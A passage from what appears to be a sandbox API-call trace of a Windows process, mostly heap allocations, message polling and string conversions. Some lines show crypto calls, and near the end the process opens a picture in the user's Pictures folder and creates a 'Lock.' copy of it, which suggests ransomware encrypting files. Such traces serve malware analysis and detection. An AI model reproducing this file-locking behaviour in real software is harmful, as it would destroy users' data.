wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0248.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0248.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.330] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0248.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0248.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0248.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0248.330] CryptDestroyHash (hHash=0xa87250) returned 1 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0248.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0248.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0248.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0248.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0248.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0248.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0248.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0248.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0248.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0248.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0248.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0248.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0248.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0248.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/d6Gq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d6gq.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0248.336] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.336] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0248.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0248.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0248.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0248.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0248.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0248.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.337] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0248.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0248.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0248.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0248.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.d6Gq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.d6gq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0248.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.386] HeapFree (in: hHeap=0x970000, 